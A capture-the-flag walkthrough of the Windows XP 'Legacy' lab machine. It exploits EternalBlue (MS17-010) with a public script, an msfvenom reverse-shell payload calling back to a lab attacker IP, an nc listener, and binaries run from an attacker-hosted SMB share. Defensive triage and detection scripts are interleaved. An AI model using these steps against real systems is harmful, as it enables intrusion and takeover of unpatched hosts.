Step 1. Reconnaissance.

After planning and scoping, the first step in every penetration test is Information Gathering and Vulnerability Identification, or simply Reconnaissance. Most testers start with nmap, a powerful tool for determining open ports and the services behind them. We'll use a default nmap scan, which checks the 1,000 most popular ports of each protocol (TCP and UDP). However, I encourage you to scan the entire port range 1-65535. It's best to run the full scan in the background while you proceed with the penetration test. The goal is to have additional leads for exploiting the target machine if you ever get stuck with the services found during the standard scan.

The list of well-known ports can be found here — link.

Run default nmap scan (TCP)

The flags used are explained below:

root@kali:~# nmap 10.10.10.4 -sC -sV -O -oN /root/Desktop/nmap

-sC: equivalent to --script=default
-sV: probe open ports to determine service/version info
-O: enable OS detection
-oN /root/Desktop/nmap: save normal output to a file

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-28 00:01 EDT
Nmap scan report for 10.10.10.4
Host is up (0.018s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (92%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP2 or Windows Small Business Server 2003 (92%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (92%), Microsoft Windows XP SP2 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows XP Professional SP2 (90%), Microsoft Windows XP SP2 or Windows Server 2003 (90%), Microsoft Windows 2000 Server (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: -4h37m58s, deviation: 2h07m16s, median: -6h07m58s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:a2:cc:0b (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2019-09-28T03:53:26+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.17 seconds

There are two open TCP ports: 139 (netbios-ssn) and 445 (microsoft-ds). You can read about these protocols here: link and link.

Run default nmap scan (UDP)

root@kali:~# nmap -sU 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-08 12:09 EDT
Nmap scan report for 10.10.10.4
Host is up (0.018s latency).
Not shown: 999 open|filtered ports
PORT STATE SERVICE
137/udp open netbios-ns

Nmap done: 1 IP address (1 host up) scanned in 12.88 seconds

There is one open UDP port: 137 (netbios-ns).

Enumerate SMB protocol

To move forward with our testing, we need to enumerate the services running on TCP 139, TCP 445 and UDP 137 to see if they are vulnerable. To achieve this, we will use the pre-canned nmap scripts matching the "smb-vuln*" wildcard.

root@kali:~# nmap --script smb-vuln* -p 137,139,445 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-08 17:18 EDT
Nmap scan report for 10.10.10.4
Host is up (0.018s latency).
PORT STATE SERVICE
137/tcp filtered netbios-ns
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 6.72 seconds

As you can see, the nmap scripts found two vulnerabilities:
CVE-2008-4250
CVE-2017-0143

Both are high-severity vulnerabilities, so chances are we'll be able to exploit either of them on the target machine.

For this exercise, we will exploit the second vulnerability, CVE-2017-0143, known as EternalBlue. For those who don't know, this is one of the most damaging vulnerabilities to date. According to Wikipedia, the exploitation of EternalBlue (WannaCry, NotPetya and BadRabbit) caused over $1 billion worth of damages in over 65 countries. Apparently, the vulnerability was first discovered by the National Security Agency (NSA) and used as a zero-day exploit until it was leaked by the Shadow Brokers hacker group in April 2017.
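Before moving on, it is worth turning the scan output above into something a defender can act on. The following Python script is an added example, not part of the original walkthrough and not part of nmap: it parses nmap's normal output (a constructed sample modelled on the results above, with nmap's usual indentation) and extracts the three conditions that matter on this host: SMB message signing disabled, SMB1-only negotiation, and smb-vuln-* scripts reporting VULNERABLE together with their CVE IDs. All function and variable names are my own.

```python
import re

# Constructed sample modelled on the nmap output earlier in this write-up
# (indentation follows nmap's normal output format); not a live scan result.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.4
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
# A script header is "| name:" or "|_name:" with the name directly after the bar.
HEADER_RE = re.compile(r"^\|(?:_| )([\w-]+):\s*(.*)$")
# Nested "key: value" lines inside a script block carry extra indentation.
FIELD_RE = re.compile(r"^\|_?\s+([\w ]+?):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_nmap(text):
    """Return open ports and per-script fields from nmap normal (-oN) output."""
    report = {"open_ports": [], "scripts": {}}
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service = m.groups()
            if state == "open":
                report["open_ports"].append((int(port), proto, service))
            continue
        m = HEADER_RE.match(line)
        if m:
            current = m.group(1)
            report["scripts"][current] = {"summary": m.group(2).strip(), "fields": {}}
            continue
        m = FIELD_RE.match(line) if current else None
        if m:
            report["scripts"][current]["fields"][m.group(1).strip()] = m.group(2).strip()
    return report


def vulnerable_cves(report):
    """CVE IDs from every smb-vuln-* script whose State is VULNERABLE (sorted, deduplicated)."""
    cves = set()
    for name, data in report["scripts"].items():
        if name.startswith("smb-vuln-") and data["fields"].get("State") == "VULNERABLE":
            cves.update(CVE_RE.findall(data["fields"].get("IDs", "")))
    return sorted(cves)


def triage(report):
    """Turn the parsed scan into (severity, finding) pairs a remediation ticket can carry."""
    findings = []
    scripts = report["scripts"]
    signing = scripts.get("smb-security-mode", {}).get("fields", {}).get("message_signing", "")
    if signing.startswith("disabled"):
        findings.append(("MEDIUM", "SMB message signing disabled: enforce signing via policy"))
    if "negotiation failed" in scripts.get("smb2-time", {}).get("summary", ""):
        findings.append(("HIGH", "SMB2 negotiation failed, host speaks SMB1 only: disable SMB1 or isolate host"))
    for name, data in sorted(scripts.items()):
        fields = data["fields"]
        if name.startswith("smb-vuln-") and fields.get("State") == "VULNERABLE":
            cves = ", ".join(CVE_RE.findall(fields.get("IDs", ""))) or "no CVE listed"
            findings.append((fields.get("Risk factor", "HIGH"),
                             f"{name} reports VULNERABLE ({cves}): patch or decommission"))
    return findings


if __name__ == "__main__":
    parsed = parse_nmap(SAMPLE_NMAP_OUTPUT)
    print("open ports:", parsed["open_ports"])
    for severity, text in triage(parsed):
        print(f"[{severity}] {text}")
```

Note that scripts which return `false` or an `ERROR:` line (ms10-054 and ms10-061 above) never reach the VULNERABLE branch, so an errored script is silently a gap in coverage rather than a clean result; re-run those with -d before signing off on the host.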

Step 2. Weaponization

A quick Google search shows that there are quite a few Python scripts available on GitHub that can be used to exploit the EternalBlue vulnerability. We will use the one found at https://github.com/helviojunior/MS17-010. Unlike some other scripts I've come across, this one can be used against different Windows platforms and does some of the legwork for you when it comes to guessing key parameters such as named pipes.

Download Python Script

root@kali:~# git clone https://github.com/helviojunior/MS17-010
Cloning into 'MS17-010'...
remote: Enumerating objects: 202, done.
remote: Total 202 (delta 0), reused 0 (delta 0), pack-reused 202
Receiving objects: 100% (202/202), 118.50 KiB | 1.97 MiB/s, done.
Resolving deltas: 100% (115/115), done.

Generate Reverse-Shell Payload

In order to generate a reverse-shell payload, we will use msfvenom, which ships with the Metasploit Framework. Even though msfvenom is part of the Metasploit Framework, it is allowed during the OSCP exam without any limitation.

root@kali:~/MS17-010# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=2225 -f exe > ms17-010.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

The newly generated payload (ms17-010.exe) makes the target machine establish a reverse shell back to Kali Linux (current IP: 10.10.14.4) on TCP port 2225. I saved the payload in the same directory where I downloaded the Python script that exploits the EternalBlue vulnerability.

Start Netcat Listener

As defined in the payload, Netcat will listen on port 2225.

root@kali:~# nc -nvlp 2225
listening on [any] 2225 ...

Step 3. Delivery / Exploitation / Command and Control

All three steps, Delivery, Exploitation and Command and Control, happen at the same time as soon as we execute the Python script: it delivers and runs our newly generated payload, which gives us control of the target machine. There is no Installation step in this penetration test.

Run Python Script

root@kali:~/MS17-010# python send_and_execute.py 10.10.10.4 ms17-010.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x82047a80
SESSION: 0xe1227968
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe125bc30
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe125bcd0
overwriting token UserAndGroups
Sending file C862OZ.exe…
Opening SVCManager on 10.10.10.4…..
Creating service bHrD…..
Starting service bHrD…..
The NETBIOS connection with the remote host timed out.
Removing service bHrD…..
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done
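From the blue-team side, the trace above is a textbook remote service-execution pattern: a file with a random name is written to the host, a service with a random four-letter name is created and started, and the service is removed seconds later. The Python below is an added example (not part of the exploit script and not from the original post) that scores Windows System log service-installation records (Event ID 7045, with 7036 state changes) for exactly those traits. The event records, their field names and the ImagePath value are constructed for this example.

```python
from datetime import datetime

# Constructed Windows System log records (not real data) modelled on the trace above:
# service bHrD created with a randomly named binary, started, and gone seconds later.
# Field names and the image path are assumptions for this example.
SAMPLE_EVENTS = [
    {"time": "2019-10-08T17:31:02", "event_id": 7045, "host": "LEGACY", "service_name": "bHrD",
     "image_path": "%SystemRoot%\\C862OZ.exe", "account": "LocalSystem"},
    {"time": "2019-10-08T17:31:04", "event_id": 7036, "host": "LEGACY", "service_name": "bHrD",
     "state": "running"},
    {"time": "2019-10-08T17:31:20", "event_id": 7036, "host": "LEGACY", "service_name": "bHrD",
     "state": "stopped"},
    {"time": "2019-10-08T09:12:40", "event_id": 7045, "host": "LEGACY", "service_name": "VMTools",
     "image_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", "account": "LocalSystem"},
]

VOWELS = set("aeiouAEIOU")


def looks_random(name):
    """Heuristic for tool-generated names such as bHrD or C862OZ:
    hardly any vowels, or letters that keep flipping between lower and upper case."""
    letters = [c for c in name if c.isalpha()]
    if len(name) < 4 or len(letters) < 2:
        return False
    vowel_ratio = sum(c in VOWELS for c in name) / len(name)
    flips = sum(a.islower() != b.islower() for a, b in zip(letters, letters[1:]))
    return vowel_ratio < 0.2 or flips / (len(letters) - 1) >= 0.5


def binary_stem(image_path):
    """'%SystemRoot%\\C862OZ.exe' -> 'C862OZ' (drop directories, quotes, arguments, extension)."""
    leaf = image_path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1]
    return leaf.split(" ")[0].rsplit(".", 1)[0]


def detect_service_abuse(events, window_seconds=60, allowlist=frozenset()):
    """Score each 7045 service installation; alert when at least two traits match."""
    stops = [e for e in events if e["event_id"] == 7036 and e.get("state") == "stopped"]
    alerts = []
    for inst in (e for e in events if e["event_id"] == 7045):
        name = inst["service_name"]
        if name in allowlist:
            continue
        reasons = []
        if looks_random(name):
            reasons.append(f"service name '{name}' looks machine-generated")
        stem = binary_stem(inst["image_path"])
        if looks_random(stem):
            reasons.append(f"binary name '{stem}' looks machine-generated")
        installed_at = datetime.fromisoformat(inst["time"])
        # A service that stops within a minute of being installed is a one-shot execution vehicle.
        for stop in stops:
            if stop["host"] == inst["host"] and stop["service_name"] == name:
                delta = (datetime.fromisoformat(stop["time"]) - installed_at).total_seconds()
                if 0 <= delta <= window_seconds:
                    reasons.append(f"service stopped {int(delta)}s after installation")
                    break
        if len(reasons) >= 2:
            alerts.append({"host": inst["host"], "service_name": name,
                           "image_path": inst["image_path"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_service_abuse(SAMPLE_EVENTS):
        print(f"{alert['host']}: service {alert['service_name']} ({alert['image_path']})")
        for reason in alert["reasons"]:
            print("  -", reason)
```

The name heuristic will occasionally flag legitimate mixed-case service names, which is why the allowlist parameter exists and why two independent traits are required before an alert fires; in practice the strongest single signal is the install-then-stop timing, which a legitimate software installation almost never produces.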

Verify Netcat Listener

Once the Python script has been run, we should be able to see an incoming connection to Netcat from the target machine. It means that we have now got a reverse shell.

root@kali:~/MS17-010# nc -nvlp 2225
listening on [any] 2225 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.4] 1045
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

Step 4. Actions on Objectives

The last step in this penetration test is to capture two flags: one in user.txt and another in root.txt. To be able to read both files, we need to make sure we have superuser privileges on the target machine. The equivalent of root on Windows is NT AUTHORITY\SYSTEM.

Execute Standard Commands to Find Current User

If we had meterpreter (part of the Metasploit Framework), we would execute getuid, but the use of meterpreter is limited during the OSCP exam. Most Linux distributions have whoami for exactly the same purpose. However, the target machine is running Windows XP, which does not ship with either of these programs. And echo %username% does not display what we want either: a shell started by a service inherits the service's environment, where the USERNAME variable is not set, so the variable is echoed back unexpanded.

C:\WINDOWS\system32>echo %username%
echo %username%
%username%

So we need to get whoami onto the target machine by running it directly from an SMB server hosted on the Kali machine.

Locate Whoami

root@kali:~/MS17-010# locate whoami
/usr/bin/ldapwhoami
/usr/bin/whoami
/usr/share/bash-completion/completions/ldapwhoami
/usr/share/man/man1/ldapwhoami.1.gz
/usr/share/man/man1/whoami.1.gz
/usr/share/windows-resources/binaries/whoami.exe

whoami.exe is located at /usr/share/windows-resources/binaries/whoami.exe.

Locate SMB Server

root@kali:~/MS17-010# locate smbserver
/usr/bin/impacket-smbserver
/usr/lib/python2.7/dist-packages/impacket/smbserver.py
/usr/share/doc/python-impacket/examples/smbserver.py

The Impacket SMB server is installed under /usr/lib/python2.7/dist-packages/impacket, with a runnable example script at /usr/share/doc/python-impacket/examples/smbserver.py.

Start SMB Server and Move Whoami to TEMP

The following command starts an SMB server on the Kali machine that exposes the windows-binaries directory (which contains whoami.exe) as a share named temp:

root@kali:~/MS17-010# sudo /usr/share/doc/python-impacket/examples/smbserver.py temp /usr/share/windows-binaries/
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Verify if SMB Server is Running

root@kali:~/MS17-010# smbclient //10.10.14.4/temp
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \>

Now we go back to the SMB server terminal and check whether there are any new messages. If there are, the SMB server is running.

[*] Incoming connection (10.10.14.4,50798)
[*] AUTHENTICATE_MESSAGE (WORKGROUP\root,KALI)
[*] User root\KALI authenticated successfully
[*] root::WORKGROUP:4141414141414141:02e921c283035c75375630488a8577f8:010100000000000080a37360127ed50114d7af66f62da17200000000010010007800750076006a006c004e006d0056000200100074006a007200790069006b0049007300030010007800750076006a006c004e006d0056000400100074006a007200790069006b00490073000700080080a37360127ed501060004000200000008003000300000000000000000000000000000005f676d5e0aa7c7af521fdfdeac595c2d0c54d95c031a73f8311be296a91c7de80a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e00340000000000

Yes, SMB Server is Running.

Verify if TEMP Contains Whoami

The following command helps us verify that our file share temp contains whoami.exe (it does!):

root@kali:~/MS17-010# smbclient //10.10.14.4/temp
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 4096 Mon Sep 9 09:56:18 2019
.. D 4096 Mon Sep 9 09:56:18 2019
exe2bat.exe AN 53248 Wed Jul 17 05:31:43 2019
vncviewer.exe AN 364544 Wed Jul 17 05:31:43 2019
radmin.exe AN 704512 Wed Jul 17 05:31:43 2019
nc.exe AN 59392 Wed Jul 17 05:31:43 2019
fgdump D 4096 Mon Sep 9 09:56:18 2019
wget.exe AN 308736 Wed Jul 17 05:31:43 2019
klogger.exe AN 23552 Wed Jul 17 05:31:43 2019
whoami.exe AN 66560 Wed Jul 17 05:31:43 2019
nbtenum D 4096 Mon Sep 9 09:56:18 2019
plink.exe AN 311296 Wed Jul 17 05:31:43 2019
fport D 4096 Mon Sep 9 09:56:18 2019
mbenum D 4096 Mon Sep 9 09:56:18 2019
enumplus D 4096 Mon Sep 9 09:56:18 2019
148529400 blocks of size 7680. 148529400 blocks available
smb: \>

Execute Whoami on Target

The remaining part is to run whoami.exe on the target machine over SMB:

C:\WINDOWS\system32>\\10.10.14.4\temp\whoami.exe
\\10.10.14.4\temp\whoami.exe
NT AUTHORITY\SYSTEM
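Executing a binary straight from a remote UNC share while running as SYSTEM, as just shown, is a strong detection signal on the defender's side. The script below is an added example, not from the original post: it walks process-creation records (a constructed sample in the shape of a Sysmon Event ID 1 or EDR feed; the field names are assumptions) and flags images loaded from UNC paths as well as SYSTEM-level shells spawned by parents that are not normal service hosts.

```python
import re

UNC_RE = re.compile(r"^\\\\([^\\]+)\\([^\\]+)\\(.+)$")
SYSTEM_ACCOUNT = "NT AUTHORITY\\SYSTEM"
# Parents from which a SYSTEM-level cmd.exe is ordinarily expected (assumption; tune per environment).
EXPECTED_SHELL_PARENTS = {"services.exe", "svchost.exe", "winlogon.exe"}

# Constructed process-creation records (not real telemetry) modelled on the session above;
# the keys follow a Sysmon Event ID 1 style but are assumptions for this example.
SAMPLE_PROCESS_EVENTS = [
    {"host": "LEGACY", "user": "NT AUTHORITY\\SYSTEM", "image": "C:\\WINDOWS\\system32\\cmd.exe",
     "parent_image": "C:\\WINDOWS\\C862OZ.exe"},
    {"host": "LEGACY", "user": "NT AUTHORITY\\SYSTEM", "image": "\\\\10.10.14.4\\temp\\whoami.exe",
     "parent_image": "C:\\WINDOWS\\system32\\cmd.exe"},
    {"host": "LEGACY", "user": "LEGACY\\john", "image": "C:\\WINDOWS\\system32\\notepad.exe",
     "parent_image": "C:\\WINDOWS\\explorer.exe"},
    {"host": "LEGACY", "user": "LEGACY\\john", "image": "\\\\fileserver\\apps\\setup.exe",
     "parent_image": "C:\\WINDOWS\\explorer.exe"},
]


def basename(path):
    """Last path component, lower-cased, for both backslash and forward-slash paths."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_unc_execution(event, trusted_hosts):
    """Flag a process whose image was loaded from a UNC path.
    A share on a trusted host used by an ordinary user is tolerated; SYSTEM context or an
    unknown host is not."""
    m = UNC_RE.match(event["image"])
    if not m:
        return None
    share_host, share = m.group(1), m.group(2)
    if share_host in trusted_hosts and event["user"] != SYSTEM_ACCOUNT:
        return None
    return ("HIGH", f"image executed from remote share \\\\{share_host}\\{share} as {event['user']}")


def check_system_shell(event):
    """Flag cmd.exe running as SYSTEM under a parent that is not a normal service host."""
    if basename(event["image"]) != "cmd.exe" or event["user"] != SYSTEM_ACCOUNT:
        return None
    parent = basename(event["parent_image"])
    if parent in EXPECTED_SHELL_PARENTS:
        return None
    return ("HIGH", f"SYSTEM shell spawned by unexpected parent {parent}")


def scan_process_events(events, trusted_hosts=frozenset()):
    """Run every check over every record and collect the hits."""
    alerts = []
    for ev in events:
        for check in (lambda e: check_unc_execution(e, trusted_hosts), check_system_shell):
            hit = check(ev)
            if hit:
                alerts.append({"host": ev["host"], "user": ev["user"], "image": ev["image"],
                               "severity": hit[0], "reason": hit[1]})
    return alerts


if __name__ == "__main__":
    for alert in scan_process_events(SAMPLE_PROCESS_EVENTS, trusted_hosts={"fileserver"}):
        print(f"[{alert['severity']}] {alert['host']} {alert['user']}: {alert['reason']}")
```

The two checks deliberately fire on different records of the same session: the first catches the shell that the service-installed payload spawned, the second catches the tool fetched over SMB from the attacker's own share, so either one alone still surfaces the intrusion.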

Find User and Root Flags

user.txt

The user flag is normally located on the desktop of a regular user (C:\Documents and Settings\User\Desktop).

C:\WINDOWS\system32>cd..
cd..
C:\WINDOWS>cd..
cd..
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\
16/03/2017 08:30 πμ 0 AUTOEXEC.BAT
16/03/2017 08:30 πμ 0 CONFIG.SYS
16/03/2017 09:07 πμ <DIR> Documents and Settings
16/03/2017 08:33 πμ <DIR> Program Files
07/10/2019 08:15 πμ <DIR> WINDOWS
2 File(s) 0 bytes
3 Dir(s) 6.484.275.200 bytes free
C:\>cd documents and settings
cd documents and settings
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings
16/03/2017 09:07 πμ <DIR> .
16/03/2017 09:07 πμ <DIR> ..
16/03/2017 09:07 πμ <DIR> Administrator
16/03/2017 08:29 πμ <DIR> All Users
16/03/2017 08:33 πμ <DIR> john
0 File(s) 0 bytes
5 Dir(s) 6.484.275.200 bytes free
C:\Documents and Settings>cd john
cd john
C:\Documents and Settings\john>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john
16/03/2017 08:33 πμ <DIR> .
16/03/2017 08:33 πμ <DIR> ..
16/03/2017 09:19 πμ <DIR> Desktop
16/03/2017 08:33 πμ <DIR> Favorites
16/03/2017 08:33 πμ <DIR> My Documents
16/03/2017 08:20 πμ <DIR> Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.484.275.200 bytes free
C:\Documents and Settings\john>cd desktop
cd desktop
C:\Documents and Settings\john\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john\Desktop
16/03/2017 09:19 πμ <DIR> .
16/03/2017 09:19 πμ <DIR> ..
16/03/2017 09:19 πμ 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.484.275.200 bytes free
C:\Documents and Settings\john\Desktop>more user.txt
more user.txt
e69af0e... (redacted)

We successfully found a user flag.

root.txt

The root flag is normally located on the Administrator's desktop (C:\Documents and Settings\Administrator\Desktop).

C:\Documents and Settings>cd administrator
cd administrator
C:\Documents and Settings\Administrator>cd desktop
cd desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator\Desktop
16/03/2017 09:18 πμ <DIR> .
16/03/2017 09:18 πμ <DIR> ..
16/03/2017 09:18 πμ 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 6.484.217.856 bytes free
C:\Documents and Settings\Administrator\Desktop>more root.txt
more root.txt
993442d... (redacted)